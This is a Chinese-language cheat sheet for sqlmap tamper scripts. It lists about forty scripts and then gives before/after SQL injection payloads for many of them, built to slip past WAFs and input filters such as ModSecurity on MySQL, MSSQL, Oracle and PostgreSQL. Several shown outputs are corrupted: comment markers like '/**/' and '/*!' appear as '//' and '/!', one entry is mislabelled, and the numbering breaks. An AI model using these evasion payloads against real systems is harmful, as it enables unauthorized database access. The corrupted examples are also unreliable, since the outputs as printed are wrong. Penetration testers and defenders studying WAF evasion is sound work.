sqlmap

sqlmap_tamper

1. apostrophemask.py 用UTF-8全角字符替换单引号字符

2. apostrophenullencode.py 用非法双字节unicode字符替换单引号字符

3. appendnullbyte.py 在payload末尾添加空字符编码

4. base64encode.py 对给定的payload全部字符使用Base64编码

5. between.py 分别用“NOT BETWEEN 0 AND #”替换大于号“>”，“BETWEEN # AND #”替换等于号“=”

6. bluecoat.py 在SQL语句之后用有效的随机空白符替换空格符，随后用“LIKE”替换等于号“=”

7. chardoubleencode.py 对给定的payload全部字符使用双重URL编码（不处理已经编码的字符）

8. charencode.py 对给定的payload全部字符使用URL编码（不处理已经编码的字符）

9. charunicodeencode.py 对给定的payload的非编码字符使用Unicode URL编码（不处理已经编码的字符）

10. concat2concatws.py 用“CONCAT_WS(MID(CHAR(0), 0, 0), A, B)”替换像“CONCAT(A, B)”的实例

11. equaltolike.py 用“LIKE”运算符替换全部等于号“=”

12. greatest.py 用“GREATEST”函数替换大于号“>”

13. halfversionedmorekeywords.py 在每个关键字之前添加MySQL注释

14. ifnull2ifisnull.py 用“IF(ISNULL(A), B, A)”替换像“IFNULL(A, B)”的实例

15. lowercase.py 用小写值替换每个关键字字符

16. modsecurityversioned.py 用注释包围完整的查询

17. modsecurityzeroversioned.py 用当中带有数字零的注释包围完整的查询

18. multiplespaces.py 在SQL关键字周围添加多个空格

19. nonrecursivereplacement.py 用representations替换预定义SQL关键字，适用于过滤器

20. overlongutf8.py 转换给定的payload当中的所有字符

21. percentage.py 在每个字符之前添加一个百分号

22. randomcase.py 随机转换每个关键字字符的大小写

23. randomcomments.py 向SQL关键字中插入随机注释

24. securesphere.py 添加经过特殊构造的字符串

25. sp_password.py 向payload末尾添加“sp_password” for automatic obfuscation from DBMS logs

26. space2comment.py 用“/**/”替换空格符

27. space2dash.py 用破折号注释符“–”其次是一个随机字符串和一个换行符替换空格符

28. space2hash.py 用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符

29. space2morehash.py 用磅注释符“#”其次是一个随机字符串和一个换行符替换空格符

30. space2mssqlblank.py 用一组有效的备选字符集当中的随机空白符替换空格符

31. space2mssqlhash.py 用磅注释符“#”其次是一个换行符替换空格符

32. space2mysqlblank.py 用一组有效的备选字符集当中的随机空白符替换空格符

33. space2mysqldash.py 用破折号注释符“–”其次是一个换行符替换空格符

34. space2plus.py 用加号“+”替换空格符

35. space2randomblank.py 用一组有效的备选字符集当中的随机空白符替换空格符

36. unionalltounion.py 用“UNION SELECT”替换“UNION ALL SELECT”

37. unmagicquotes.py 用一个多字节组合%bf%27和末尾通用注释一起替换空格符

38. varnish.py 添加一个HTTP头“X-originating-IP”来绕过WAF

39. versionedkeywords.py 用MySQL注释包围每个非函数关键字

40. versionedmorekeywords.py 用MySQL注释包围每个关键字

41. xforwardedfor.py 添加一个伪造的HTTP头“X-Forwarded-For”来绕过WAF

42. apostrophemask.py

适用数据库：ALL
作用：将引号替换为utf-8，用于过滤单引号
使用脚本前：tamper(“1 AND ‘1’=’1”)
使用脚本后：1 AND %EF%BC%871%EF%BC%87=%EF%BC%871

2. base64encode.py

适用数据库：ALL
作用：替换为base64编码
使用脚本前：tamper(“1’ AND SLEEP(5)#”)
使用脚本后：MScgQU5EIFNMRUVQKDUpIw==

3. multiplespaces.py

适用数据库：ALL
作用：围绕sql关键字添加多个空格
使用脚本前：tamper(‘1 UNION SELECT foobar’)
使用脚本后：1 UNION SELECT foobar

4. space2plus.py

适用数据库：ALL
作用：用加号替换空格
使用脚本前：tamper(‘SELECT id FROM users’)
使用脚本后：SELECT+id+FROM+users

5. nonrecursivereplacement.py

适用数据库：ALL
作用：作为双重查询语句，用双重语句替代预定义的sql关键字（适用于非常弱的自定义过滤器，例如将select替换为空）
使用脚本前：tamper(‘1 UNION SELECT 2–’)
使用脚本后：1 UNIOUNIONN SELESELECTCT 2–

6. space2randomblank.py

适用数据库：ALL
作用：将空格替换为其他有效字符
使用脚本前：tamper(‘SELECT id FROM users’)
使用脚本后：SELECT%0Did%0DFROM%0Ausers

7. unionalltounion.py

适用数据库：ALL
作用：将union allselect 替换为unionselect
使用脚本前：tamper(‘-1 UNION ALL SELECT’)
使用脚本后：-1 UNION SELECT

8. securesphere.py

适用数据库：ALL
作用：追加特定的字符串
使用脚本前：tamper(‘1 AND 1=1’)
使用脚本后：1 AND 1=1 and ‘0having’=’0having’

9. space2dash.py

适用数据库：ALL
作用：将空格替换为–，并添加一个随机字符串和换行符
使用脚本前：tamper(‘1 AND 9227=9227’)
使用脚本后：1–nVNaVoPYeva%0AAND–ngNvzqu%0A9227=9227

10. space2mssqlblank.py

适用数据库：Microsoft SQL Server
测试通过数据库：Microsoft SQL Server 2000、Microsoft SQL Server 2005
作用：将空格随机替换为其他空格符号(‘%01’, ‘%02’, ‘%03’, ‘%04’, ‘%05’, ‘%06’, ‘%07’, ‘%08’, ‘%09’, ‘%0B’, ‘%0C’, ‘%0D’, ‘%0E’, ‘%0F’, ‘%0A’)
使用脚本前：tamper(‘SELECT id FROM users’)
使用脚本后：SELECT%0Eid%0DFROM%07users

11. between.py

测试通过数据库：Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
作用：用NOT BETWEEN 0 AND #替换>
使用脚本前：tamper(‘1 AND A > B–’)
使用脚本后：1 AND A NOT BETWEEN 0 AND B–

12. percentage.py

适用数据库：ASP
测试通过数据库：Microsoft SQL Server 2000, 2005、MySQL 5.1.56, 5.5.11、PostgreSQL 9.0
作用：在每个字符前添加一个%
使用脚本前：tamper(‘SELECT FIELD FROM TABLE’)
使用脚本

后：%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E

13. sp_password.py

适用数据库：MSSQL
作用：从T-SQL日志的自动迷糊处理的有效载荷中追加sp_password
使用脚本前：tamper(‘1 AND 9227=9227– ‘)
使用脚本后：1 AND 9227=9227– sp_password

14. charencode.py

测试通过数据库：Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
作用：对给定的payload全部字符使用url编码（不处理已经编码的字符）
使用脚本前：tamper(‘SELECT FIELD FROM%20TABLE’)
使用脚本

后：%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45

15. randomcase.py

测试通过数据库：Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
作用：随机大小写
使用脚本前：tamper(‘INSERT’)
使用脚本后：INseRt

16. charunicodeencode.py

适用数据库：ASP、ASP.NET
测试通过数据库：Microsoft SQL Server 2000/2005、MySQL 5.1.56、PostgreSQL 9.0.3
作用：适用字符串的unicode编码
使用脚本前：tamper(‘SELECT FIELD%20FROM TABLE’)
使用脚本

后：%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045

17. space2comment.py

测试通过数据库：Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
作用：将空格替换为//
使用脚本前：tamper(‘SELECT id FROM users’)
使用脚本后：SELECT//id//FROM//users

18. equaltolike.py

测试通过数据库：Microsoft SQL Server 2005、MySQL 4, 5.0 and 5.5
作用：将=替换为LIKE
使用脚本前：tamper(‘SELECT * FROM users WHERE id=1’)
使用脚本后：SELECT * FROM users WHERE id LIKE 1

19. equaltolike.py

测试通过数据库：MySQL 4, 5.0 and 5.5、Oracle 10g、PostgreSQL 8.3, 8.4, 9.0
作用：将>替换为GREATEST，绕过对>的过滤
使用脚本前：tamper(‘1 AND A > B’)
使用脚本后：1 AND GREATEST(A,B+1)=A

20. ifnull2ifisnull.py

适用数据库：MySQL、SQLite (possibly)、SAP MaxDB (possibly)
测试通过数据库：MySQL 5.0 and 5.5
作用：将类似于IFNULL(A, B)替换为IF(ISNULL(A), B, A)，绕过对IFNULL的过滤
使用脚本前：tamper(‘IFNULL(1, 2)’)
使用脚本后：IF(ISNULL(1),2,1)

21. modsecurityversioned.py

适用数据库：MySQL
测试通过数据库：MySQL 5.0
作用：过滤空格，使用mysql内联注释的方式进行注入
使用脚本前：tamper(‘1 AND 2>1–’)
使用脚本后：1 /!30874AND 2>1/–

22. space2mysqlblank.py

适用数据库：MySQL
测试通过数据库：MySQL 5.1
作用：将空格替换为其他空格符号(‘%09’, ‘%0A’, ‘%0C’, ‘%0D’, ‘%0B’)
使用脚本前：tamper(‘SELECT id FROM users’)
使用脚本后：SELECT%0Bid%0DFROM%0Cusers

23. modsecurityzeroversioned.py

适用数据库：MySQL
测试通过数据库：MySQL 5.0
作用：使用内联注释方式（/!00000/）进行注入
使用脚本前：tamper(‘1 AND 2>1–’)
使用脚本后：1 /!00000AND 2>1/–

24. space2mysqldash.py

适用数据库：MySQL、MSSQL
作用：将空格替换为 – ，并追随一个换行符
使用脚本前：tamper(‘1 AND 9227=9227’)
使用脚本后：1–%0AAND–%0A9227=9227

25. bluecoat.py

适用数据库：Blue Coat SGOS
测试通过数据库：MySQL 5.1,、SGOS
作用：在sql语句之后用有效的随机空白字符替换空格符，随后用LIKE替换=
使用脚本前：tamper(‘SELECT id FROM users where id = 1’)
使用脚本后：SELECT%09id FROM users where id LIKE 1

26. versionedkeywords.py

适用数据库：MySQL
测试通过数据库：MySQL 4.0.18, 5.1.56, 5.5.11
作用：注释绕过
使用脚本前：tamper(‘1 UNION ALL SELECT NULL, NULL,

CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,100,114,117,58))#’)
使用脚本后：1/!UNION//!ALL//!SELECT//!NULL/,/!NULL/,

CONCAT(CHAR(58,104,116,116,58),IFNULL(CAST(CURRENT_USER()/!AS//!CHAR/),CHAR(32)),CHAR(58,100,114,117,58))#

27. halfversionedmorekeywords.py

适用数据库：MySQL < 5.1
测试通过数据库：MySQL 4.0.18/5.0.22
作用：在每个关键字前添加mysql版本注释
使用脚本前：tamper(“value’ UNION ALL SELECT

CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS

CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND

‘QDWa’=’QDWa”)
使用脚本后：

value’/!0UNION/!0ALL/!0SELECT/!0CONCAT(/!0CHAR(58,107,112,113,58),/!0IFNULL(CAST(/!0CURRENT_USER()/!0AS/!0CHAR),/!0CHAR(32)),/!0CHAR(58,97,110,121,58)),/!0NULL,/!0NULL#/!0AND ‘QDWa’=’QDWa

28. space2morehash.py

适用数据库：MySQL >= 5.1.13
测试通过数据库：MySQL 5.1.41
作用：将空格替换为#，并添加一个随机字符串和换行符
使用脚本前：tamper(‘1 AND 9227=9227’)
使用脚本后：

1%23ngNvzqu%0AAND%23nVNaVoPYeva%0A%23lujYFWfv%0A9227=9227

29. apostrophenullencode.py

适用数据库：ALL
作用：用非法双字节Unicode字符替换单引号
使用脚本前：tamper(“1 AND ‘1’=’1”)
使用脚本后：1 AND %00%271%00%27=%00%271

30. appendnullbyte.py

适用数据库：ALL
作用：在有效载荷的结束位置加载null字节字符编码
使用脚本前：tamper(‘1 AND 1=1’)
使用脚本后：1 AND 1=1%00

31. chardoubleencode.py

适用数据库：ALL
作用：对给定的payload全部字符使用双重url编码（不处理已经编码的字符）
使用脚本前：tamper(‘SELECT FIELD FROM%20TABLE’)
使用脚本

后：%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545

32. unmagicquotes.py

适用数据库：ALL
作用：用一个多字节组合%bf%27和末尾通用注释一起替换空格
使用脚本前：tamper(“1’ AND 1=1”)
使用脚本后：1%bf%27 AND 1=1–

33. randomcomments.py

适用数据库：ALL
作用：用注释符分割sql关键字
使用脚本前：tamper(‘INSERT’)
使用脚本后：I//N//SERT